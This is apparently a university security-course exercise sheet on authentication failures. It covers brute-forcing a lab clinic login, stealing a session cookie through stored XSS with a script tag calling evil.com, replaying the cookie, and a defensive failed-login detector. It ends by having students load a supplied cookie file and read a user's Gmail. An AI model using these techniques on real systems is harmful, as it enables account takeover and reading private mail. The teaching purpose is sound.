Exercise: Identification and Authentication Failures

Bruteforce a login system

We have an application: KIS Klinik Sonnenschein. We want to bruteforce the site.
Automate login tests.
Write a small PHP (or Java, Python, or any language you like) program to run on your laptop. The program must send a login request for a username and a password that you can input, and it must test whether the login is valid. You can test with the user house. The password is given in Moodle.
Brute force the login
  • Modify your program to test with the list of most commonly used passwords (Passwords). Select the list darkweb2017-top100.txt. You will test user bie1.
  • Modify the previous program so that it loops over all possible passwords with 4 letters.
    Find the password for user taub (this could take a long time; start the next exercise while waiting for the result).
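
Seen from the server side, the dictionary and exhaustive runs above leave a recognisable pattern in the login log. The following is an added example, not part of the original exercise sheet: a sliding-window detector that flags accounts with a burst of failed logins and marks those where a success follows the burst. The log line format, the function names and the thresholds are assumptions; the sample log is constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def make_sample_log():
    """Constructed log lines; the format is an assumption, not the KIS application's."""
    t0 = datetime(2024, 5, 1, 10, 0, 0)
    def line(sec, user, result):
        return f"{(t0 + timedelta(seconds=sec)).isoformat()} user={user} result={result}"
    log = [line(0, "house", "OK")]
    log += [line(10 + i, "bie1", "FAIL") for i in range(6)]   # rapid guesses
    log += [line(16, "bie1", "OK")]                           # ...then a hit
    log += [line(20 + i, "taub", "FAIL") for i in range(8)]   # rapid guesses, no hit
    log += [line(300, "house", "FAIL"), line(900, "house", "OK")]  # ordinary typo
    return "\n".join(log)

def detect_bruteforce(log_text, max_failures=5, window=timedelta(seconds=60)):
    """Map user -> 'attacked' (failure burst) or 'compromised' (burst, then success)."""
    recent = defaultdict(deque)  # user -> timestamps of failures still inside the window
    flagged = {}
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        stamp, *fields = raw.split()
        rec = dict(f.split("=", 1) for f in fields)
        ts, user = datetime.fromisoformat(stamp), rec["user"]
        failures = recent[user]
        while failures and ts - failures[0] > window:   # expire old failures
            failures.popleft()
        if rec["result"] == "FAIL":
            failures.append(ts)
            if len(failures) >= max_failures:
                flagged.setdefault(user, "attacked")
        elif flagged.get(user) == "attacked" and failures:
            flagged[user] = "compromised"   # success while the burst is still in the window
    return flagged

if __name__ == "__main__":
    for user, status in detect_bruteforce(make_sample_log()).items():
        print(user, status)
```

A per-account lockout or delay driven by the same counter would stop the exhaustive run long before it covers the 4-letter keyspace.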

Access the sessionID cookie

This exercise is to be done in the "guestbook" application in your virtual machine.
  • Modify your stored XSS script in order to read the session ID cookie.
  • Send the cookie by generating a new script node (<script src="https://evil.com/?sessionID=xxxxxx"></script>). You do not need to have such a server, just verify inside the browser that a request has been sent.
  • Manually generate a GET request containing this cookie.
    $ telnet localhost 80
    You should see the page with the change password form (meaning that you are logged-in).

Credentials Theft

In Firefox, create a new profile. Download the cookies.sqlite file from Moodle. Copy this file into the profile directory that has been created for your new profile. Restart Firefox.
Go to gmail.com. Read the emails of the user.